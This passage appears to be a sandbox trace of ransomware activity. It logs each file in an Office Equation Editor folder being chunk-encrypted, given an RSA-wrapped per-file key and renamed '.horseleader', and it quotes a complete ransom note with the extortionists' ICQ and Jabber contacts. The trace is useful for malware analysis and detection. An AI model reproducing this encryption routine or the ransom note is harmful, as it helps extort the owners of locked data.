lpNewFilePointer=0x0) returned 1 [0225.899] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.901] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.901] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.902] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xaa60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.903] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.903] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0225.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0225.903] CloseHandle (hObject=0x1a4) returned 1 [0225.904] GetProcessHeap () returned 0x780000 [0225.904] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0225.904] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.horseleader") returned 87 [0225.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.horseleader")) returned 1 [0225.905] GetProcessHeap () returned 0x780000 [0225.905] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0225.905] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, 
ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0225.905] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0225.905] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\#Decrypt#.txt") returned 78 [0225.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.906] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0225.906] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0225.907] lstrlenA (lpString="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") returned 1368 [0225.907] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0225.907] CloseHandle (hObject=0x158) returned 1 [0225.907] GetProcessHeap () returned 0x780000 [0225.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.907] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0225.907] lstrcmpiW (lpString1="EQNEDT32.CNT", lpString2="Windows") returned -1 [0225.907] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 72 [0225.907] StrStrIW (lpFirst="EQNEDT32.CNT", lpSrch=".horseleader") returned 0x0 [0225.907] lstrcmpW (lpString1="EQNEDT32.CNT", lpString2="#Decrypt#.txt") returned 1 [0225.908] lstrcmpW (lpString1="EQNEDT32.CNT", lpString2="_uninstalling_.png") returned 1 [0225.908] lstrlenW (lpString=".testttjffg") returned 11 [0225.908] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpSrch=".testttjffg") returned 0x0 [0225.908] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.908] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.962] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 72 [0225.962] StrStrW (lpFirst="EQNEDT32.CNT", lpSrch=".txt") returned 0x0 [0225.962] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2557) returned 1 [0225.962] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9fd, lpOverlapped=0x0) returned 1 [0225.965] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff603, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.965] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9fd, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9fd, lpOverlapped=0x0) returned 1 [0225.965] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.965] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.965] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.965] CloseHandle (hObject=0x158) returned 1 [0225.965] GetProcessHeap () returned 0x780000 [0225.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.966] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.horseleader") returned 84 [0225.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.horseleader")) returned 1 [0225.967] GetProcessHeap () returned 0x780000 [0225.967] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.967] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0225.967] lstrcmpiW (lpString1="EQNEDT32.EXE", lpString2="Windows") returned -1 [0225.967] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 72 [0225.967] StrStrIW (lpFirst="EQNEDT32.EXE", lpSrch=".horseleader") returned 0x0 [0225.967] lstrcmpW (lpString1="EQNEDT32.EXE", lpString2="#Decrypt#.txt") returned 1 [0225.967] lstrcmpW (lpString1="EQNEDT32.EXE", lpString2="_uninstalling_.png") returned 1 [0225.967] lstrlenW (lpString=".testttjffg") returned 11 [0225.967] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpSrch=".testttjffg") returned 0x0 [0225.967] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.967] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.968] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 72 [0225.968] StrStrW (lpFirst="EQNEDT32.EXE", lpSrch=".txt") returned 0x0 [0225.968] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=543304) returned 1 [0225.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.968] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.970] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.971] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.972] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3fd24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.972] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.974] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.974] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.974] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x7fa48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.974] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.977] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.977] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.977] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.977] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.977] CloseHandle (hObject=0x158) returned 1 [0225.977] GetProcessHeap () returned 0x780000 [0225.978] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.978] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.horseleader") returned 84 [0225.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.horseleader")) returned 1 [0225.979] GetProcessHeap () returned 0x780000 [0225.979] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.979] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, 
dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0225.979] lstrcmpiW (lpString1="eqnedt32.exe.manifest", lpString2="Windows") returned -1 [0225.979] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0225.979] StrStrIW (lpFirst="eqnedt32.exe.manifest", lpSrch=".horseleader") returned 0x0 [0225.979] lstrcmpW (lpString1="eqnedt32.exe.manifest", lpString2="#Decrypt#.txt") returned 1 [0225.979] lstrcmpW (lpString1="eqnedt32.exe.manifest", lpString2="_uninstalling_.png") returned 1 [0225.979] lstrlenW (lpString=".testttjffg") returned 11 [0225.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpSrch=".testttjffg") returned 0x0 [0225.979] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.979] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.981] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0225.981] StrStrW (lpFirst="eqnedt32.exe.manifest", lpSrch=".txt") returned 0x0 [0225.981] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=566) returned 1 [0225.981] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x236, lpOverlapped=0x0) returned 1 [0225.982] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.982] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x236, lpOverlapped=0x0) returned 1 [0225.982] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.983] CloseHandle (hObject=0x158) returned 1 [0225.983] GetProcessHeap () returned 0x780000 [0225.983] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.983] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.horseleader") returned 93 [0225.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\equation\\eqnedt32.exe.manifest.horseleader")) returned 1 [0225.984] GetProcessHeap () returned 0x780000 [0225.984] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.984] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0225.984] lstrcmpiW (lpString1="EQNEDT32.HLP", lpString2="Windows") returned -1 [0225.984] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0225.985] StrStrIW (lpFirst="EQNEDT32.HLP", lpSrch=".horseleader") returned 0x0 [0225.985] lstrcmpW (lpString1="EQNEDT32.HLP", lpString2="#Decrypt#.txt") returned 1 [0225.985] lstrcmpW (lpString1="EQNEDT32.HLP", lpString2="_uninstalling_.png") returned 1 [0225.985] lstrlenW (lpString=".testttjffg") returned 11 [0225.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", lpSrch=".testttjffg") returned 0x0 [0225.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft 
shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.986] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0225.986] StrStrW (lpFirst="EQNEDT32.HLP", lpSrch=".txt") returned 0x0 [0225.986] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=176311) returned 1 [0225.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.986] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.989] 